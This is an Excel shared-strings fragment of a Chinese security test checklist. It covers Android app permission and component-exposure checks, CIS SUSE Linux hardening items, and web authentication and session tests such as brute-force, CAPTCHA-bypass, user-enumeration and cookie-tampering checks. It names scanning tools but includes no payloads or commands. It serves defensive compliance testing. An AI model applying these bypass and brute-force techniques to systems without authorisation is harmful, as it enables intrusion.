  <si>
    <t>'003 检查后台删除联系人行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的删除联系人设置为“提示”</t>
  </si>
  <si>
    <t>'004 检查后台读取短信/彩信行为</t>
  </si>
  <si>
    <t>'1、LBE对后台读取短彩信行为进行监控</t>
  </si>
  <si>
    <t>'005 检查后台修改短信/彩信记录行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的修改短信/彩信记录设置为“提示”</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.WRITE_SMS</t>
  </si>
  <si>
    <t>'006 检查后台删除短信/彩信记录行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的删除短信/彩信设置为“提示”</t>
  </si>
  <si>
    <t>'007 检查后台发送短信/彩信行为</t>
  </si>
  <si>
    <t>'1、LBE对后台发送短信/彩信行为进行监控</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.SEND_SMS</t>
  </si>
  <si>
    <t>'008 检查注册类短信发送前是否明示</t>
  </si>
  <si>
    <t>'1、首次启动应用，检查LBE是否会检测到应用发送注册类短信（包含免费注册相关短信）</t>
  </si>
  <si>
    <t>'1、LBE检测到这类短信发送前，需要明示用户。不管这个信息是收费还是免费的，都需要明示。且要如果发送的是短信，需要声明是产生短信费用，如果申明的是信息费用也是不合格的</t>
  </si>
  <si>
    <t>'009 检查通过短信购买前是否明示</t>
  </si>
  <si>
    <t>'1、打开应用，选择应用中的短信支付功能，比如短信购买游戏币等，检查短信发送前是否明示用户</t>
  </si>
  <si>
    <t>'1、LBE检测到此类付费短信发送前，应用需要明示用户</t>
  </si>
  <si>
    <t>'1、该行为对应权限android.permission.SEND_SMS</t>
  </si>
  <si>
    <t>'010 检查自动填充验证码是否明示用户</t>
  </si>
  <si>
    <t>'2、当应用自动填充验证码时，会读取用户短信，如果读取全部短信则认为其收集用户数据。则需要提前明示用户</t>
  </si>
  <si>
    <t>若不涉及注册码自动填充，则不涉及此用例</t>
  </si>
  <si>
    <t>'011 检查后台读取通话记录行为</t>
  </si>
  <si>
    <t>'1、LBE对后台读取通话记录行为进行监控</t>
  </si>
  <si>
    <t>'012 检查后台修改通话记录行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的修改通话记录设置为“提示”</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.WRITE_CALL_LOG</t>
  </si>
  <si>
    <t>'013 检查后台删除通话记录行为</t>
  </si>
  <si>
    <t>'1、手机中有手机管家，且手机管家中对应用的删除通话记录设置为“提示”</t>
  </si>
  <si>
    <t>'014 检查后台拨打电话行为</t>
  </si>
  <si>
    <t>'1、LBE对后台拨打电话行为进行监控</t>
  </si>
  <si>
    <t>'015 检查包月资费发送提醒行为</t>
  </si>
  <si>
    <t>'1、有包月资费业务的应用</t>
  </si>
  <si>
    <t>'016 检查后台调用摄像头行为</t>
  </si>
  <si>
    <t>'1、LBE对后台调用摄像头行为进行监控</t>
  </si>
  <si>
    <t>'017 检查后台定位行为</t>
  </si>
  <si>
    <t>'1、LBE对后台定位行为进行监控</t>
  </si>
  <si>
    <t>'018 检查后台录音行为</t>
  </si>
  <si>
    <t>'1、LBE对后台录音行为进行监控</t>
  </si>
  <si>
    <t>该行为对应权限android.permission.record_audio；如果有明显录音标识的按钮或文字说明则不算后台行为</t>
  </si>
  <si>
    <t>'019 检查后台更改移动网络开关、WIFI开关和蓝牙开关状态时，是否提前明示用户</t>
  </si>
  <si>
    <t>'020 检查后台联网行为</t>
  </si>
  <si>
    <t>'1、LBE对应用联网进行监控（数据业务联网和wifi联网都需要监控）</t>
  </si>
  <si>
    <t>'021 检查联网应用在本地tab页得联网行为</t>
  </si>
  <si>
    <t>'022 检查应用的签名</t>
  </si>
  <si>
    <t>'1、PC安装JDK环境</t>
  </si>
  <si>
    <t>'1、有第三方公司的签名信息，不能出现debug的签名（签名信息中含有debug字样，如CN=Android Debug等）。姓名、部门或公司名称这三项中需保证至少有一项不为空，且需保证所填信息真实有效，不能为网址、乱码等无效信息。（且对于非谷歌官方的应用，不得采用Android公开证书，即出现类似这些信息：Android/emailAddress=android@android.com）</t>
  </si>
  <si>
    <t>'001 APK权限检查</t>
  </si>
  <si>
    <t>Level 2</t>
  </si>
  <si>
    <t>'2、按权限申请总表描述确认测试结果（可以参考按“测试结果样例”中的填写相关列里的结果，减少遗漏）</t>
  </si>
  <si>
    <t>'002 检查应用的运行权限</t>
  </si>
  <si>
    <t>'4.此应用（不论是自研应用，还是预置的第三方应用）在USER显示的是类似app_XX/u0_aXX的形式，如果以root或system用户运行要评估是否为必需（几乎都是非必须的）</t>
  </si>
  <si>
    <t>JellyBean版本上是u0_aXX的形式，I及以前的都是app_XX的形式</t>
  </si>
  <si>
    <t>'003 检查应用的多余权限</t>
  </si>
  <si>
    <t>'1、手机有root权限</t>
  </si>
  <si>
    <t>'2、应用程序禁止保留当前业务功能不使用的多余权限</t>
  </si>
  <si>
    <t>'004 检查应用是否有system权限</t>
  </si>
  <si>
    <t>'2、如果所测应用包含的是userId="XXX"某数字，直接pass。但如果所测应用包含的是sharedUserId="1000"，说明该应用运行权限为system，需要确认是否必须为system</t>
  </si>
  <si>
    <t>'005 检查应用是否有reboot权限</t>
  </si>
  <si>
    <t>'1、检查应用中是否申请了权限：android.permission.REBOOT</t>
  </si>
  <si>
    <t>'1、一般都不会申请此权限，如果有申请，要确认必要性</t>
  </si>
  <si>
    <t>如未提供说明，直接提单</t>
  </si>
  <si>
    <t>'006 检查应用Debuggable属性设置</t>
  </si>
  <si>
    <t>'1、查看Manifest文件</t>
  </si>
  <si>
    <t>'1、Debuggable属性设置：android:debuggable="false"</t>
  </si>
  <si>
    <t>'007 检查应用可卸性</t>
  </si>
  <si>
    <t>'1、根据“通用特性配置库”列表，有一列“是否可卸载”，检查应用，尝试进行卸载，对要求可以卸载的是否能卸载</t>
  </si>
  <si>
    <t>'1、列表要求可以卸载的应用能正常卸载</t>
  </si>
  <si>
    <t>'008 检查Content Provider的访问权限控制</t>
  </si>
  <si>
    <t>'1、Mercury工具已安装</t>
  </si>
  <si>
    <t>'009 检查应用AllowBackup属性设置</t>
  </si>
  <si>
    <t>'1、AllowBackup属性设置：android:allowBackup="false"</t>
  </si>
  <si>
    <t>'010 检查应用ProtectionLevel属性设置</t>
  </si>
  <si>
    <t>'1、ProtectionLevel属性设置：android:protectionLevel="0x00000002" | "0x00000003"，也就是signature和systemOrSignature</t>
  </si>
  <si>
    <t>'001 手机组件NULL Intent攻击</t>
  </si>
  <si>
    <t>'1、android手机运行正常</t>
  </si>
  <si>
    <t>'1、手机组件有NULL Intent判断机制，扫描结果未出现异常现象。</t>
  </si>
  <si>
    <t>'001 Activity组建检查</t>
  </si>
  <si>
    <t>'1、Drozer/IntentSuite扫描，发现暴露的Activity，并结合业务进行分析，发送Intent给暴露的Activity</t>
  </si>
  <si>
    <t>'002 Service组件检查</t>
  </si>
  <si>
    <t>'003 Broadcast Receiver组件检查</t>
  </si>
  <si>
    <t>'004 Content Provider组件检查</t>
  </si>
  <si>
    <t>'001 不存在特殊方式登录portal端</t>
  </si>
  <si>
    <t>'004 不提供的功能需要硬删除代码</t>
  </si>
  <si>
    <t>'006 接口认证（禁止不经认证直接访问系统的接口）</t>
  </si>
  <si>
    <t>'007 禁止空口令</t>
  </si>
  <si>
    <t>'008 禁止隐秘访问方式</t>
  </si>
  <si>
    <t>'009 客户端无特殊接口使得能够被远程控制</t>
  </si>
  <si>
    <t>不存在后台远程控制的接口</t>
  </si>
  <si>
    <t>'010 资料中需要写明客户端提供的命令、参数、接口</t>
  </si>
  <si>
    <t>'011 禁止在产品中提供可破解口令的工具或能力</t>
  </si>
  <si>
    <t>'001 认证基本要求</t>
  </si>
  <si>
    <t>身份认证通过后，才能访问系统的受限资源。</t>
  </si>
  <si>
    <t>红线</t>
  </si>
  <si>
    <t>'002 禁止存在绕过认证的访问方式</t>
  </si>
  <si>
    <t>红线 高</t>
  </si>
  <si>
    <t>'003 接口接入存在认证机制</t>
  </si>
  <si>
    <t>产品对外的接口存在接入认证机制</t>
  </si>
  <si>
    <t>'004 接口认证缺省用户</t>
  </si>
  <si>
    <t>产品交付必须提供缺省用户的访问清单</t>
  </si>
  <si>
    <t>'005 所有用户访问口令可修改</t>
  </si>
  <si>
    <t>'006 不存在隐藏或未文档化接入方式公开</t>
  </si>
  <si>
    <t>没有未文档化的接入方式</t>
  </si>
  <si>
    <t>'007 接入方式公开使用安全的协议</t>
  </si>
  <si>
    <t>'1.使用的协议都是安全版本，没有使用FTP telnet和SSH V1</t>
  </si>
  <si>
    <t>'008 管理访问接入认证要求</t>
  </si>
  <si>
    <t>'009 通信矩阵</t>
  </si>
  <si>
    <t>高</t>
  </si>
  <si>
    <t>'1.产品提供通信矩阵文档</t>
  </si>
  <si>
    <t>'010 近端访问认证要求</t>
  </si>
  <si>
    <t>近端访问的接口要有认证机制</t>
  </si>
  <si>
    <t>'011 采用基于角色的帐号权限管理模型</t>
  </si>
  <si>
    <t>'1.软件包是准确的</t>
  </si>
  <si>
    <t>'002 软件数字签名机制</t>
  </si>
  <si>
    <t>'003 源代码静态检查</t>
  </si>
  <si>
    <t>'001 禁止在代码中存储明文的敏感数据</t>
  </si>
  <si>
    <t>'1.产品提供的软件包</t>
  </si>
  <si>
    <t>'1.用Fortify扫描代码。</t>
  </si>
  <si>
    <t>'002 敏感数据加密传输</t>
  </si>
  <si>
    <t>'003 对敏感信息的访问要有认证</t>
  </si>
  <si>
    <t>'005 敏感信息加密存储</t>
  </si>
  <si>
    <t>'006 个人数据过滤或匿名化处理</t>
  </si>
  <si>
    <t>'007 个人数据处理功能公开</t>
  </si>
  <si>
    <t>'008 华为人员参与对现网设备中个人数据进一步整理与分析的场景</t>
  </si>
  <si>
    <t>'009 使用没有专利的安全标准加密算法</t>
  </si>
  <si>
    <t>'1.产品提供软件包</t>
  </si>
  <si>
    <t>'010 用于加密的密钥可配置</t>
  </si>
  <si>
    <t>'011 输出编码</t>
  </si>
  <si>
    <t>'012 上传、下载路径限制</t>
  </si>
  <si>
    <t>'014 禁止采集用户原始通信内容</t>
  </si>
  <si>
    <t>'017 确保我司保存的用户数据可以为用户本人所控制、查询、更新、删除。</t>
  </si>
  <si>
    <t>'1.产品需有用户对用户数据操作的功能</t>
  </si>
  <si>
    <t>'018 给予用户停止使用我司服务、注销账号等权利，并确保用户退出或者注销后，我司能精确的删除该用户的全部数据。</t>
  </si>
  <si>
    <t>功能测试</t>
  </si>
  <si>
    <t>'02.不安全的加密方式</t>
  </si>
  <si>
    <t>'03.根密钥与工作密钥的生成安全</t>
  </si>
  <si>
    <t>'04.根密钥与工作密钥的使用安全</t>
  </si>
  <si>
    <t>'05.证书签名算法</t>
  </si>
  <si>
    <t>'06.敏捷性的密码算法设计</t>
  </si>
  <si>
    <t>'07.使用安全随机函数</t>
  </si>
  <si>
    <t>'08.分组算法优先选择CBC模式</t>
  </si>
  <si>
    <t>'09.分组算法每次必需使用不可预测的IV值</t>
  </si>
  <si>
    <t>'13.RSA算法不选用PKCS1填充方式</t>
  </si>
  <si>
    <t>'14.非对称加密算法保护数据机密性时，禁止使用私钥加密数据</t>
  </si>
  <si>
    <t>'15.使用RSA算法时，非对称加密和签名要使用不同的密钥对</t>
  </si>
  <si>
    <t>'16.使用DSA签名时签名的r、s值均不为0</t>
  </si>
  <si>
    <t>'17.在同时进行加密和签名时，使用先签名后加密的方式</t>
  </si>
  <si>
    <t>'18.不使用二进制域的ECDSA认证方式</t>
  </si>
  <si>
    <t>'20.IPSEC中实现DH算法时应对双方交换的公共值的特殊值过滤</t>
  </si>
  <si>
    <t>'21.禁止将hash(key||message)方式当作MAC来使用</t>
  </si>
  <si>
    <t>'22.在同时进行加密操作和MAC计算时，需使用不同的密钥</t>
  </si>
  <si>
    <t>'001 日志记录完整性</t>
  </si>
  <si>
    <t>检查系统日志记录是否涵盖所有管理面用户活动</t>
  </si>
  <si>
    <t>'002 审计日志完备性检查</t>
  </si>
  <si>
    <t>检查日志是否记录了系统需审计的所有操作</t>
  </si>
  <si>
    <t>'003 外部接口日志记录权限控制及审计日志记录</t>
  </si>
  <si>
    <t>一些系统通过soap等接口可以记录日志，需要对这些记录日志的用户权限进行控制</t>
  </si>
  <si>
    <t>日志文件大小没有监控机制，在日志文件持续增多时可能产生磁盘空间不足，导致拒绝服务。</t>
  </si>
  <si>
    <t>'005 安全日志级别</t>
  </si>
  <si>
    <t>涉及系统安全的安全类日志表征着系统安全配置的改变或是否正在遭受攻击，是十分重要的日志信息，应该设置相对较高的日志级别。</t>
  </si>
  <si>
    <t>'008 审计日志访问权限控制</t>
  </si>
  <si>
    <t>'001 Nessus工具检查系统安全性</t>
  </si>
  <si>
    <t>'1.被测目标系统正常运行</t>
  </si>
  <si>
    <t>'002 SecureCAT工具检查系统安全性（suse 11）</t>
  </si>
  <si>
    <t>'003 SecureCAT工具检查系统安全性(suse 10)</t>
  </si>
  <si>
    <t>'004 检查SSH配置</t>
  </si>
  <si>
    <t>业界标准 (CIS)1.3 Configure SSH----《CIS_SUSE_Linux_Benchmark_v2.0》(P.12)</t>
  </si>
  <si>
    <t>低</t>
  </si>
  <si>
    <t>业界标准 (CIS)7.6 Deactivate Wireless Interfaces----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.83)</t>
  </si>
  <si>
    <t>'1、检查结果均为：pass</t>
  </si>
  <si>
    <t>业界标准 (CIS)5.1.3 Ensure rsh server is not enabled (Scored)/5.1.4 Ensure rsh client is not installed (Scored/5.1.7 Ensure telnet server is not enabled (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.41-44)</t>
  </si>
  <si>
    <t>'1、检查结果为：pass</t>
  </si>
  <si>
    <t>业界标准 (CIS)2.6 Only Enable TFTP Server if Absolutely Necessary----《CIS_SUSE_Linux_Benchmark_v2.0》(P.19)</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.2 Verify Permissions on /etc/passwd (Scored)/12.3 Verify Permissions on /etc/shadow (Scored)/12.4 Verify Permissions on /etc/group (Scored)/12.5 Verify User/Group Ownership on /etc/passwd (Scored)/12.6 Verify User/Group Ownership on /etc/shadow (Scored)/12.7 Verify User/Group Ownership on /etc/group (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.150)</t>
  </si>
  <si>
    <t>中</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.9 Find Un-owned Files and Directories (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.150)</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.10 Find Un-grouped Files and Directories (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.152)</t>
  </si>
  <si>
    <t>业界标准 (CIS)13.1 Ensure Password Fields are Not Empty (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.154)</t>
  </si>
  <si>
    <t>'1、使用SecureCat工具扫描操作系统，确认检查项13.10 Check for Presence of User .rhosts Files (Scored)是否pass</t>
  </si>
  <si>
    <t>业界标准 (CIS)13.10 Check for Presence of User .rhosts Files (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.161)</t>
  </si>
  <si>
    <t>业界标准 (CIS)6.7 Find Unauthorized SUID/SGID System Executables----《CIS_SUSE_Linux_Benchmark_v2.0》(P.41)</t>
  </si>
  <si>
    <t>'1.查看SecureCat工具扫描报告，确认检查项6.8 Find All Unowned File是否pass</t>
  </si>
  <si>
    <t>业界标准 (CIS)6.8 Find All Unowned Files----《CIS_SUSE_Linux_Benchmark_v2.0》(P.41)</t>
  </si>
  <si>
    <t>业界标准 (CIS)9.5 Restrict Access to the su Command (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.135)</t>
  </si>
  <si>
    <t>'1.检查的配置符合预期，没有预期外的用户或组能通过SSH接入登陆系统</t>
  </si>
  <si>
    <t>业界标准 (CIS)9.2.13 Limit Access via SSH ----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.129)</t>
  </si>
  <si>
    <t>业界标准 (CIS)7.3 Prevent X Server From Listening On Port 6000/tcp----《CIS_SUSE_Linux_Benchmark_v2.0》(P.44)</t>
  </si>
  <si>
    <t>业界标准 (CIS)7.8 Set LILO/GRUB Password ----《CIS_SUSE_Linux_Benchmark_v2.0》(P.47)</t>
  </si>
  <si>
    <t>业界标准 (CIS)7.11 Only Enable syslog To Accept Messages If Absolutely Necessary----《CIS_SUSE_Linux_Benchmark_v2.0》(P.50)</t>
  </si>
  <si>
    <t>'026 提示用户更改初始密码或密钥等预验证属性</t>
  </si>
  <si>
    <t>'027 确认不存在密码为空的账户</t>
  </si>
  <si>
    <t>业界标准 (CIS)8.2 Verify That There Are No Accounts With Empty Password Fields----《CIS_SUSE_Linux_Benchmark_v2.0》(P.52)</t>
  </si>
  <si>
    <t>'028 用户能够随时、独立的更改密码。</t>
  </si>
  <si>
    <t>'029 口令不明文回显</t>
  </si>
  <si>
    <t>'1.命名明确且配置有密码</t>
  </si>
  <si>
    <t>'031 审计配置检查</t>
  </si>
  <si>
    <t>业界标准 (CIS)8.1.18 Make the Audit Configuration Immutable (Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.105)</t>
  </si>
  <si>
    <t>'032 检查rsyslog日志文件的权限</t>
  </si>
  <si>
    <t>'1、对于"步骤3"：如果没有专门的安全管理员组，则&lt;owner&gt;:&lt;group&gt;值为root：root 文件权限为600；如果有专门的安全管理员组，则&lt;owner&gt;:&lt;group&gt;值为root：&lt;securegrp&gt;，文件权限为 640</t>
  </si>
  <si>
    <t>业界标准 (CIS)8.2.4 Create and Set Permissions on rsyslog Log Files ----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.109)</t>
  </si>
  <si>
    <t>'033 安全相关的事件必须有一个精确的时间戳和一个唯一的系统参考记录</t>
  </si>
  <si>
    <t>'1.安全相关的事件都有一个精确的时间戳和一个唯一的系统参考记录。</t>
  </si>
  <si>
    <t>'034 确认系统中没有更新、补丁以及其他安全软件的缺失</t>
  </si>
  <si>
    <t>业界标准 (CIS)1.1 Install Updates, Patches and Additional Security Software----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.13)</t>
  </si>
  <si>
    <t>'035 确认系统应用最新的操作系统补丁</t>
  </si>
  <si>
    <t>业界标准 (CIS)1.1 Apply Latest OS Patches----《CIS_SUSE_Linux_Benchmark_v2.0》(P.11)</t>
  </si>
  <si>
    <t>'036 检查为危险文件是否创建符号链接，防止被恶意覆盖</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.1 Create Symlinks For Dangerous Files----《CIS_SUSE_Linux_Benchmark_v2.0》(P.67)</t>
  </si>
  <si>
    <t>'037 检查是否启用了TCP SYN Cookie防护，避免DoS攻击</t>
  </si>
  <si>
    <t>'1、结果为1，不是0</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.2 Enable TCP SYN Cookie Protection----《CIS_SUSE_Linux_Benchmark_v2.0》(P.67)</t>
  </si>
  <si>
    <t>'038 确认系统LILO/GRUB安全设置合理</t>
  </si>
  <si>
    <t>'1、文件权限为600</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.3 Additional LILO/GRUB Security----《CIS_SUSE_Linux_Benchmark_v2.0》(P.68)</t>
  </si>
  <si>
    <t>'039 检查系统中是否有不需要开机启动的服务</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.4 Evaluate Packages Associated With Startup Scripts----《CIS_SUSE_Linux_Benchmark_v2.0》(P.68)</t>
  </si>
  <si>
    <t>业界标准 (CIS)12.5 Evaluate Every Installed Package----《CIS_SUSE_Linux_Benchmark_v2.0》(P.69)</t>
  </si>
  <si>
    <t>'041 系统帐号的缺省口令检查</t>
  </si>
  <si>
    <t>'042 安全资料检查</t>
  </si>
  <si>
    <t>'1.命令中的stack canary开关呈enabled状态；NX开关呈enabled状态</t>
  </si>
  <si>
    <t>其他 渗透专家建议</t>
  </si>
  <si>
    <t>'046 检查打开服务端口的进程的执行文件和数据文件，是否为other组可以访问</t>
  </si>
  <si>
    <t>业界标准 OWASP</t>
  </si>
  <si>
    <t>红线 红线</t>
  </si>
  <si>
    <t>Web容器的控制台已删除或不存在</t>
  </si>
  <si>
    <t>业界标准</t>
  </si>
  <si>
    <t>优秀实践</t>
  </si>
  <si>
    <t>'006 检查Web容器以最小权限运行，禁止使用高权限用户运行Web容器</t>
  </si>
  <si>
    <t>没有使用“root”、“administrator”等特权操作系统帐号运行Web</t>
  </si>
  <si>
    <t>'010 检查安全事件及操作事件有没有相应的日志记录</t>
  </si>
  <si>
    <t>Web部署目录中，不存在文件扩展名包含大写字母的页面。</t>
  </si>
  <si>
    <t>'013 检查Web系统是否含有过时的、用于备份的以及未被引用的文件</t>
  </si>
  <si>
    <t>'014 检查Web内容目录是否含有敏感文件</t>
  </si>
  <si>
    <t>Web业务运行正常</t>
  </si>
  <si>
    <t>'016 使用DirBuster进行目录列表测试</t>
  </si>
  <si>
    <t>所有对目录的访问均不能打印出文件列表。</t>
  </si>
  <si>
    <t>'017 检查Web系统是否含有调试用的代码/页面</t>
  </si>
  <si>
    <t>'018 Web系统是否有未公开的管理界面</t>
  </si>
  <si>
    <t>'019 Robots方式的敏感目录、接口查找</t>
  </si>
  <si>
    <t>'020 检查是否存在不安全的HTTP方法</t>
  </si>
  <si>
    <t>Web服务器运行正常</t>
  </si>
  <si>
    <t>'021 检查是否关闭STRUTS2调试模式</t>
  </si>
  <si>
    <t>其他</t>
  </si>
  <si>
    <t>'027 Tomcat安全配置检查</t>
  </si>
  <si>
    <t>系统无法设置弱口令，满足华为公司红线要求</t>
  </si>
  <si>
    <t>系统提供ACL组织配置功能，防止恶意用户登录系统。</t>
  </si>
  <si>
    <t>认证通过后，给当前用户显示上一次认证的有关的访问历史记录数据</t>
  </si>
  <si>
    <t>对于重要的管理事务或重要的交易事务要进行密码的重新认证</t>
  </si>
  <si>
    <t>'037 用户名，口令信息传输使用HTTPS加密通道</t>
  </si>
  <si>
    <t>系统使用HTTPS传输用户名，密码信息，且使用POST方法。（使用GET方法，则此用例仍然失败。）</t>
  </si>
  <si>
    <t>'038 登录策略设置成强制HTTPS时，修改URL仍然可以通过http方式登录</t>
  </si>
  <si>
    <t>业务页面不能够访问，必须使用HTTPS通道。</t>
  </si>
  <si>
    <t>'039 无法通过认证失败提示信息进行用户猜测与用户枚举</t>
  </si>
  <si>
    <t>无法通过以上信息判断用户用是否存在。</t>
  </si>
  <si>
    <t>'040 无法通过系统的忘记密码功能中猜测，枚举用户</t>
  </si>
  <si>
    <t>无法通过恢复功能猜测用户是否存在</t>
  </si>
  <si>
    <t>'041 WEB系统禁止使用BASIC认证方式</t>
  </si>
  <si>
    <t>禁止使用BASIC验证方式提交认证信息</t>
  </si>
  <si>
    <t>'042 WEB系统禁止使用DIGEST认证方式</t>
  </si>
  <si>
    <t>禁止使用DIGEST验证方式提交认证信息</t>
  </si>
  <si>
    <t>'043 对认证表单进行暴力破解攻击</t>
  </si>
  <si>
    <t>系统存在防暴力破解机制，无法进行暴力破解。</t>
  </si>
  <si>
    <t>优秀实践 OWASP</t>
  </si>
  <si>
    <t>'044 用户登录/认证页面，需要防止暴力破解。</t>
  </si>
  <si>
    <t>'045 多次登录/认证失败后使用验证码时，原认证表单失效</t>
  </si>
  <si>
    <t>'046 删除验证码进行绕过验证码测试</t>
  </si>
  <si>
    <t>系统无法正常登录</t>
  </si>
  <si>
    <t>'047 删除客户端登录次数进行绕过验证码测试</t>
  </si>
  <si>
    <t>'048 关闭客户端验证码进行绕过验证码测试</t>
  </si>
  <si>
    <t>'049 验证码是单一图片，且图片格式为非BMP格式</t>
  </si>
  <si>
    <t>验证码为单一图，且为非BMP格式</t>
  </si>
  <si>
    <t>'050 验证码字符串要求是随机生成</t>
  </si>
  <si>
    <t>'051 验证码内容不能与客户端提交信息相关联</t>
  </si>
  <si>
    <t>步骤5请求到的新的验证码和步骤3的验证码不一样。</t>
  </si>
  <si>
    <t>'052 验证码内容不与POST请求提交的信息相关联</t>
  </si>
  <si>
    <t>验证码与VCODE值不相关，验证码仍然随机生成。</t>
  </si>
  <si>
    <t>'053 验证码模块生成的随机数不能在客户端的静态页面中的网页源代码里出现</t>
  </si>
  <si>
    <t>在页面源文件中搜索不到步骤1的验证码字符串</t>
  </si>
  <si>
    <t>'054 验证码在一次使用后立即失效</t>
  </si>
  <si>
    <t>无法登录成功，提示验证码错误</t>
  </si>
  <si>
    <t>'055 用户名和密码以及验证码同时发送给服务器</t>
  </si>
  <si>
    <t>用户名、密码和验证码在同一个拦截窗口中，而不是分开发送</t>
  </si>
  <si>
    <t>'056 验证码检验通过后才进行用户名和密码的检验</t>
  </si>
  <si>
    <t>'057 验证码工具自动识别成功率低于5%</t>
  </si>
  <si>
    <t>验证码识别率低于5%（验证码字符全部被识别出来算一次成功）。</t>
  </si>
  <si>
    <t>'058 连续登录失败锁定策略的“允许连续失败的次数”可配置</t>
  </si>
  <si>
    <t>'059 系统对帐户的锁定时长可配置</t>
  </si>
  <si>
    <t>'060 连续登录失败后，系统对帐户进行锁定</t>
  </si>
  <si>
    <t>'061 连续失败次数指同一个帐号从最后一次登录成功以来登录失败的次数的累积值</t>
  </si>
  <si>
    <t>'062 锁定帐号在服务器端</t>
  </si>
  <si>
    <t>'063 操作员帐号锁定时间超时后自动解锁</t>
  </si>
  <si>
    <t>'064 系统管理员解锁被锁定帐户</t>
  </si>
  <si>
    <t>无法通过参数修改方式绕过认证</t>
  </si>
  <si>
    <t>无法登录系统</t>
  </si>
  <si>
    <t>'068 修改密码漏洞测试</t>
  </si>
  <si>
    <t>用户修改密码时必须提供旧密码</t>
  </si>
  <si>
    <t>普通用户无法修改其他用户的密码。</t>
  </si>
  <si>
    <t>AUTOCOMPLETE设置为"off"</t>
  </si>
  <si>
    <t>系统中不能创建两个完全相同的帐户</t>
  </si>
  <si>
    <t>操作员帐户长时间未使用自动锁定可配置</t>
  </si>
  <si>
    <t>系统提示该帐号由于长时间未使用，已被锁定。</t>
  </si>
  <si>
    <t>操作员帐号长时间未使用自动锁定后，只能由系统管理员手工解锁。手工解锁后，帐户可正常登录系统。</t>
  </si>
  <si>
    <t>被锁定帐号无法登录系统</t>
  </si>
  <si>
    <t>'078 由系统管理员锁定的帐号只能由系统管理员手工解锁</t>
  </si>
  <si>
    <t>其它管理员无法解锁用户，由系统管理员锁定的帐号只能由系统管理员手工解锁。</t>
  </si>
  <si>
    <t>'079 “长时间未解锁自动删除操作员帐号”可配置</t>
  </si>
  <si>
    <t>“长时间未解锁自动删除操作员帐号”可配置</t>
  </si>
  <si>
    <t>'080 长时间未解锁自动删除操作员帐号</t>
  </si>
  <si>
    <t>操作员表不存在operator1的帐号。</t>
  </si>
  <si>
    <t>'081 系统中的帐号不能写死在代码中</t>
  </si>
  <si>
    <t>'082 账号权限变更，是否存在相关的保护机制</t>
  </si>
  <si>
    <t>'083 对安全性要求高的系统需要进行强身份认证</t>
  </si>
  <si>
    <t>对管理员等重要账户实施强身份认证。</t>
  </si>
  <si>
    <t>业务用户不能长期被锁定，导致业务不可用</t>
  </si>
  <si>
    <t>各功能菜单的URL或页面源文件不包含不允许客户端修改的信息（比如：用户标识、权限标识、商品价格、采用IP认证的IP等）；或者，即使包含了，用户登录后，身份信息不再由客户端提交，而是以服务器端会话信息中保存的身份信息为准。</t>
  </si>
  <si>
    <t>管理员能查看到当前已成功建立用户会话的信息，包括用户名称、终端标识符（可选）、IP地址、会话创建的时间。</t>
  </si>
  <si>
    <t>'087 管理员能够强行终止指定用户的会话</t>
  </si>
  <si>
    <t>管理员能够强行终止指定用户的会话。</t>
  </si>
  <si>
    <t>'088 提供“注销/退出”按钮、菜单或命令</t>
  </si>
  <si>
    <t>界面有明显的“注销（或退出）”的按钮或菜单。（如果是命令行界面，则提供“注销/退出”的命令）</t>
  </si>
  <si>
    <t>原有Cookie失效，无法进行相应操作</t>
  </si>
  <si>
    <t>'090 检查会话超时机制</t>
  </si>
  <si>
    <t>系统超时后，对系统操作需要重新登录系统</t>
  </si>
  <si>
    <t>'091 检查会话超时机制是否在服务器端进行</t>
  </si>
  <si>
    <t>临时会话Cookie中未包含时间相关信息，说明会话超时机制在服务器端进行。</t>
  </si>
  <si>
    <t>'092 检测是否可以绕过Cookie的过期时间</t>
  </si>
  <si>
    <t>'093 禁止带有敏感信息(账户余额、交易记录、医疗记录等)的Web页面缓存</t>
  </si>
  <si>
    <t>页面缓存设置为no-cache</t>
  </si>
  <si>
    <t>'094 检查Cookie中是否存在明文敏感信息</t>
  </si>
  <si>
    <t>Cookie中不包含明文敏感信息，以及经过简单处理的敏感信息。</t>
  </si>
  <si>
    <t>'095 禁止在永久Cookie中使用不安全加密算法存储密码等敏感信息</t>
  </si>
  <si>
    <t>对敏感信息进行安全加密，或使用安全的HASH算法，禁止使用MD5,SHA1</t>
  </si>
  <si>
    <t>'096 Cookie防篡改验证</t>
  </si>
  <si>
    <t>修改后Cookie无效，无法完成相应请求操作。</t>
  </si>
  <si>
    <t>'097 Session可预测性验证</t>
  </si>
  <si>
    <t>测试结果为“excellent”</t>
  </si>
  <si>
    <t>'098 sessionid长度验证</t>
  </si>
  <si>
    <t>sessionid长度至少160bits（例如，同时出现大写字母、小写字母、数字，那么长度至少是26个字符）</t>
  </si>
  <si>
    <t>'099 Cookie溢出攻击测试</t>
  </si>
  <si>
